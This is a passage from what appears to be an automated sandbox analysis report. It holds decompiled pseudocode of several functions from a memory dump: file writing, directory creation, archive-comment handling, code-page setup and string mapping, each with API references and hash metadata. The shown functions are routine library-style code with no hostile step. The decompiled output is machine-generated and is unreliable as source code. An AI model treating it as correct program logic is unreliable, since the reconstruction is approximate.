				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E00196C55(0x1d00e0, _t53 + 0x1e, 0) == 0) {
									E00196E9B(0x1d00e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}

0x00199c34
0x00199c35
0x00199c3a
0x00199c3e
0x00199c4b
0x00199c55
0x00199c55
0x00199c5a
0x00199c5a
0x00199c5f
0x00199c65
0x00000000
0x00000000
0x00199c67
0x00199c6b
0x00199ccf
0x00199cd3
0x00199d2d
0x00199d30
0x00000000
0x00199cdb
0x00199cdd
0x00199ced
0x00199d28
0x00000000
0x00199d28
0x00199cf3
0x00199d04
0x00199d0a
0x00199d13
0x00199d18
0x00199d18
0x00000000
0x00199cf3
0x00000000
0x00000000
0x00000000
0x00199c6d
0x00199c6d
0x00199c6f
0x00199c76
0x00199c78
0x00199c78
0x00199c95
0x00199c9a
0x00199c9c
0x00199c9f
0x00000000
0x00000000
0x00199ca1
0x00199ca9
0x00000000
0x00000000
0x00199ccb
0x00199ccd
0x00000000
0x00000000
0x00000000
0x00199ccd
0x00000000
0x00199cad
0x00199cbc
0x00199cc5
0x00199cc9
0x00000000
0x00199cc9
0x00199c5a
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,?,0019C90A,00000001,?,?,?,00000000,001A4AF4,?,?,?,?,?,001A4599), ref: 00199C4F
WriteFile.KERNEL32(?,00000000,?,001A47A1,00000000,?,?,00000000,001A4AF4,?,?,?,?,?,001A4599,?), ref: 00199C8F
WriteFile.KERNELBASE(?,00000000,?,001A47A1,00000000,?,00000001,?,?,0019C90A,00000001,?,?,?,00000000,001A4AF4), ref: 00199CBC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: e221e469a689337d6a90f29c4ba5efdcabf5a08019f92fdd91970af62774a9b9
Instruction ID: 4bb6d155017178c720a0e462734999f497173fa86433144aa78eeaf63314928e
Opcode Fuzzy Hash: e221e469a689337d6a90f29c4ba5efdcabf5a08019f92fdd91970af62774a9b9
Instruction Fuzzy Hash: 7331367164420AAFDF248F28CC48BAABBE8FF51711F00851DF19597690C774E888CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00199EF2, Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00199EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E001AD940();
				_t21 = _a4;
				_t8 =  *(E0019B927(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E00199E6B(_t21) != 0 || E0019B32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E0019A12F(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}

0x00199efa
0x00199f00
0x00199f09
0x00199f0f
0x00199f23
0x00199f2b
0x00199f69
0x00199f6f
0x00199f72
0x00199f7e
0x00199f80
0x00199f74
0x00199f74
0x00199f77
0x00000000
0x00199f79
0x00199f7b
0x00199f7b
0x00199f77
0x00000000
0x00000000
0x00000000
0x00199f16
0x00199f19
0x00199f21
0x00199f56
0x00199f5a
0x00199f60
0x00199f60
0x00199f65
0x00000000
0x00000000
0x00000000
0x00199f21
0x00199f85

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 00199F19
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 00199F4C
GetLastError.KERNEL32(?,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 00199F69

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: b05ab1f4d54b4a2471a6c49065a10626f31f59cedeb5d1a1c60b936e893ab8f2
Instruction ID: 818d66cef9f82f32ec3e2cdf77e552c238d91479333825874df079bee7d3876b
Opcode Fuzzy Hash: b05ab1f4d54b4a2471a6c49065a10626f31f59cedeb5d1a1c60b936e893ab8f2
Instruction Fuzzy Hash: 2801B17150821866DF21ABBD9C49BFEBB4CAF16741F14045AF901E6091D764C9C1C6E6

Uniqueness

Uniqueness Score: -1.00%

Function 0019399D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0019399D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E001AD870(E001C11BE, _t153);
				E001AD940();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E0019134C(__eflags, 0x1e, _t151 + 0x1e);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E0019C5C9(_t83, _t120);
						_push(_t120);
						E001A14DE(_t153 - 0xe6ec, __eflags);
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E001A2842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E0019A728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E0019C67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E001A24D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E0019910B(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E0019A6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00196BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
									E00196E03(0x1d00e0, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E0019FBBB(_t148);
									}
								}
								L25:
								E001A16CB(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E0019C634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E00191EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E0019C699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E0019134C(__eflags, 0x1e, _t151 + 0x1e);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E0019134C(_t156, 0x1d, _t151 + 0x1e);
					E00196E03(0x1d00e0, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x0019399d
0x0019399d
0x001939a2
0x001939ac
0x001939b2
0x001939b4
0x001939bb
0x001939d9
0x001939e0
0x00193c22
0x00193c28
0x00000000
0x00193c28
0x001939e8
0x001939f9
0x001939ff
0x00000000
0x00000000
0x00193a0b
0x00193a0b
0x00193a11
0x00193a22
0x00193a23
0x00193a2c
0x00193a31
0x00193a38
0x00193a3d
0x00193a4c
0x00193a4f
0x00193a54
0x00193a57
0x00193a5a
0x00193aaf
0x00193aaf
0x00193ab5
0x00193b11
0x00193b1f
0x00193b33
0x00193b40
0x00193b46
0x00193b4c
0x00193b54
0x00193b5a
0x00193b66
0x00193b72
0x00193b75
0x00193b78
0x00193b7e
0x00193b84
0x00193b8a
0x00193b90
0x00193b96
0x00193b9c
0x00193bb5
0x00193b9e
0x00193b9e
0x00193b9f
0x00193ba0
0x00193ba1
0x00193ba1
0x00193bcf
0x00193bd1
0x00193be0
0x00193be2
0x00193c0f
0x00193be4
0x00193bf1
0x00193bfd
0x00193c02
0x00193c04
0x00193c08
0x00193c08
0x00193c04
0x00193c11
0x00193c17
0x00193c1d
0x00000000
0x00193c1f
0x00193ab7
0x00193abd
0x00193ac3
0x00000000
0x00000000
0x00193aec
0x00193af5
0x00193af5
0x00193b0c
0x00000000
0x00193b0c
0x00193a5c
0x00193a62
0x00193a82
0x00193a82
0x00193a84
0x00193a97
0x00193aaa
0x00193a86
0x00193a86
0x00193a86
0x00000000
0x00193a84
0x00193a64
0x00193a72
0x00193a78
0x00000000
0x00193a78
0x00193a66
0x00193a70
0x00000000
0x00000000
0x00000000
0x00193a70
0x00193a13
0x00193a19
0x00000000
0x00193a1b
0x00193a1b
0x00000000
0x00193a1b
0x001939bd
0x001939c3
0x001939cf
0x00193c2d
0x00193c2d
0x00193c2f
0x00193c33
0x00193c3d
0x00193c3d

APIs

__EH_prolog.LIBCMT ref: 001939A2

Strings

CMT, xrefs: 001939B1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: b538680374f109f5a81e5e9565fa20febbcaf93f4f6497773769c4ee70627faa
Instruction ID: f5e6d8913f6a952ab7007082ce521fe3636637b2f0fba10c020c8638a12bf255
Opcode Fuzzy Hash: b538680374f109f5a81e5e9565fa20febbcaf93f4f6497773769c4ee70627faa
Instruction Fuzzy Hash: 0F71CD75500F44AADF25DB30CC41AEBB7E8AB25301F44492EE5AB97242E7326A88CF11

Uniqueness

Uniqueness Score: -1.00%

Function 001BA51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BA51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;
				char* _t95;
				intOrPtr _t99;
				signed int _t100;

				_t93 = __edx;
				_t63 =  *0x1cd668; // 0x44aa1787
				_v8 = _t63 ^ _t100;
				_t99 = _a4;
				_t4 = _t99 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t99 + 0x119; // 0x1bab69
					_t94 = _t47;
					_t88 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t94;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t95 = _t94 + _t88;
						_t69 = _t68 + _t95;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t95 = 0;
							} else {
								_t72 = _t99 + _t88;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t88 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t99 + _t88 + 0x19) =  *(_t99 + _t88 + 0x19) | 0x00000010;
							_t54 = _t88 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t95 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t99 + 0x119; // 0x1bab69
						_t94 = _t61;
						_t88 = _t88 + 1;
						__eflags = _t88 - 0x100;
					} while (_t88 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t100 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t91 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t106 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t91 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t100 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t91 = _t91 + 2;
						__eflags = _t91;
						_t75 =  *_t91;
					}
					_t13 = _t99 + 4; // 0x5efc4d8b
					E001BB5EA(0, _t93, 0x100, _t99, _t106, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t99 + 4; // 0x5efc4d8b
					_t19 = _t99 + 0x21c; // 0x2ebf88b
					E001B97C2(0x100, _t99, _t106, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t99 + 4; // 0x5efc4d8b
					_t23 = _t99 + 0x21c; // 0x2ebf88b
					E001B97C2(0x100, _t99, _t106, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t92 = 0;
					do {
						_t68 =  *(_t100 + _t92 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t99 + _t92 + 0x119) = 0;
							} else {
								_t37 = _t99 + _t92 + 0x19;
								 *_t37 =  *(_t99 + _t92 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x304));
								goto L15;
							}
						} else {
							 *(_t99 + _t92 + 0x19) =  *(_t99 + _t92 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t100 + _t92 - 0x204));
							L15:
							 *(_t99 + _t92 + 0x119) = _t68;
						}
						_t92 = _t92 + 1;
					} while (_t92 < 0x100);
				}
				return E001AE203(_t68, _v8 ^ _t100);
			}

0x001ba51e
0x001ba529
0x001ba530
0x001ba535
0x001ba540
0x001ba552
0x001ba64a
0x001ba64a
0x001ba650
0x001ba652
0x001ba653
0x001ba653
0x001ba655
0x001ba65b
0x001ba65b
0x001ba65d
0x001ba65f
0x001ba668
0x001ba66b
0x001ba677
0x001ba67e
0x001ba68e
0x001ba680
0x001ba680
0x001ba683
0x001ba683
0x001ba683
0x001ba687
0x001ba687
0x00000000
0x001ba687
0x001ba66d
0x001ba66d
0x001ba672
0x001ba672
0x001ba68a
0x001ba68a
0x001ba68a
0x001ba690
0x001ba696
0x001ba696
0x001ba69c
0x001ba69d
0x001ba69d
0x001ba558
0x001ba558
0x001ba55a
0x001ba55a
0x001ba561
0x001ba562
0x001ba566
0x001ba56c
0x001ba572
0x001ba59a
0x001ba59a
0x001ba59c
0x00000000
0x00000000
0x001ba57b
0x001ba57f
0x001ba591
0x001ba591
0x001ba593
0x00000000
0x00000000
0x001ba584
0x001ba586
0x001ba588
0x001ba590
0x001ba590
0x00000000
0x001ba590
0x00000000
0x001ba586
0x001ba595
0x001ba595
0x001ba598
0x001ba598
0x001ba59f
0x001ba5b4
0x001ba5ba
0x001ba5ce
0x001ba5d5
0x001ba5e4
0x001ba5f6
0x001ba5fd
0x001ba605
0x001ba607
0x001ba607
0x001ba611
0x001ba621
0x001ba623
0x001ba63a
0x001ba625
0x001ba625
0x001ba625
0x001ba625
0x001ba62a
0x00000000
0x001ba62a
0x001ba613
0x001ba613
0x001ba618
0x001ba631
0x001ba631
0x001ba631
0x001ba641
0x001ba642
0x001ba646
0x001ba6b1

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 001BA543

Strings

, xrefs: 001BA588

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: afd2f28d43c806ac0a9f52c439510bc12e438015c95fa10d3d89db264cf587c9
Instruction ID: 4bc80e040af3a9e957b30507d4f367dca8e3611ee53f86dc8327ae861dd11884
Opcode Fuzzy Hash: afd2f28d43c806ac0a9f52c439510bc12e438015c95fa10d3d89db264cf587c9
Instruction Fuzzy Hash: 734117B05042889ADB268E28CC94BFABBF9EF55304F5804EDE59A86142D3359A45CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00191D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00191D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E001AD870(E001C1173, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E0019399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E001916C0(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00191837(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E001A0FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E001A1059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E001A1094();
					}
					E00191837(_t68, E001B2B33( *_t68));
					_t49 = 1;
				}
				E0019159C(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}

0x00191d61
0x00191d61
0x00191d66
0x00191d6f
0x00191d73
0x00191d76
0x00191d79
0x00191d7c
0x00191d7f
0x00191d82
0x00191d8a
0x00191d90
0x00191d97
0x00191d9f
0x00191da7
0x00191db2
0x00191db5
0x00191db9
0x00191dbf
0x00191dc4
0x00191dce
0x00191de6
0x00191e07
0x00191de8
0x00191de8
0x00191df0
0x00191df9
0x00191df9
0x00191dd0
0x00191dd0
0x00191dd3
0x00191dd5
0x00191dd8
0x00191dd8
0x00191e17
0x00191e1d
0x00191e1f
0x00191e23
0x00191e2e
0x00191e38

APIs

__EH_prolog.LIBCMT ref: 00191D66

Part of subcall function 0019399D: __EH_prolog.LIBCMT ref: 001939A2

Strings

CMT, xrefs: 00191D9D

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 365954817f904b7b4dad8cb5cc509a8de8c37a9d97b78fba75ccc309d53e7851
Instruction ID: 9b30405aef45da8e2a876d43015289403461ce8d776236ff40a91acb3ae17b8d
Opcode Fuzzy Hash: 365954817f904b7b4dad8cb5cc509a8de8c37a9d97b78fba75ccc309d53e7851
Instruction Fuzzy Hash: 0F214876904109AFCF15EF98C9419EEFBF6EF69300F1004ADE855A7251CB325E95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B9C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001B9C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				intOrPtr* _t30;
				signed int _t32;

				_t25 = __ecx;
				_push(__ecx);
				_t18 =  *0x1cd668; // 0x44aa1787
				_v8 = _t18 ^ _t32;
				_push(__esi);
				_t20 = E001B9990(0x16, "LCMapStringEx", 0x1c6084, "LCMapStringEx"); // executed
				_t30 = _t20;
				if(_t30 == 0) {
					_t22 = LCMapStringW(E001B9CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0x1c2260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t30();
				}
				return E001AE203(_t22, _v8 ^ _t32);
			}

0x001b9c64
0x001b9c69
0x001b9c6a
0x001b9c71
0x001b9c74
0x001b9c86
0x001b9c8b
0x001b9c92
0x001b9cd5
0x001b9c94
0x001b9cb1
0x001b9cb7
0x001b9cb7
0x001b9ce9

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 001B9CD5

Strings

LCMapStringEx, xrefs: 001B9C75, 001B9C7F

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: ecdd231ca0756dc52ceee6f722a699c96f606506331055f6f3942daf1ce012b6
